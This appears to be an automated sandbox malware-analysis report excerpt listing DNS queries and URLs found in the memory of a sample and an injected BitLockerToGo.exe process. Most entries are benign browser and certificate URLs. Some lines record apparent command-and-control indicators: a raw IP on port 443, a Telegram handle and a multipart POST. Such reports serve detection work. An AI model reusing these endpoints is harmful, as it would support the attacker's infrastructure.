                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pzctjec2n7y58ycjw47qHost: 77.239.117.222Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: N11R7lRasm.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: N11R7lRasm.exeString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
                  Source: msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0W
                  Source: N11R7lRasm.exeString found in binary or memory: http://ocsp.digicert.com0X
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                  Source: chrome.exe, 00000007.00000003.1975477083.00005AF0010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975538792.00005AF000FD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976535112.00005AF00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974996191.00005AF000F88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976498151.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976923293.00005AF00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975588365.00005AF001114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976472737.00005AF000730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976450217.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976999250.00005AF00127C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1975516214.00005AF001148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976789017.00005AF00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                  Source: N11R7lRasm.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/03
                  Source: BitLockerToGo.exe, 00000003.00000003.1877513009.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1891805185.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/73
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/D3G
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/K
                  Source: BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/a3$
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/v
                  Source: BitLockerToGo.exe, 00000003.00000003.1906846457.0000000000CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/v3Q
                  Source: BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1934326719.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443
                  Source: BitLockerToGo.exe, 00000003.00000003.1920673890.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443FR_
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hello
                  Source: BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443hellohttps://t.me/b4cha00oomaino5Mozilla/5.0
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                  Source: chromecache_477.9.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
                  Source: chromecache_477.9.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                  Source: chrome.exe, 00000007.00000003.1970505138.00005AF000370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1970592394.00005AF000AC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100496858.00001FB400374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2100610221.00001FB400360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmp, chromecache_477.9.dr, chromecache_478.9.drString found in binary or memory: https://apis.google.com
                  Source: msedge.exe, 0000000B.00000002.2162892956.0000027C22179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: Reporting and NEL.14.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://c.msn.com/
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2167913254.00001FB40016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                  Source: chrome.exe, 00000007.00000003.1976387363.00005AF000D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973613520.00005AF000F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1979650519.00005AF000D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971155720.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971244543.00005AF000D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(TrustTokenOperationsRequiringOriginTrial#all-operat
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                  Source: msedge.exe, 0000000B.00000002.2167913254.00001FB40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: chrome.exe, 00000007.00000003.1960159923.000034DC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1960127499.000034DC002D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/cr/report
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2166755614.00001FB400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: chromecache_477.9.dr | String found in binary or memory: https://clients6.google.com
                  Source: chromecache_477.9.dr | String found in binary or memory: https://content.googleapis.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: Reporting and NEL.14.dr | String found in binary or memory: https://deff.nelreports.net/api/report
                  Source: Reporting and NEL.14.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: Reporting and NEL.14.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://docs.google.com/
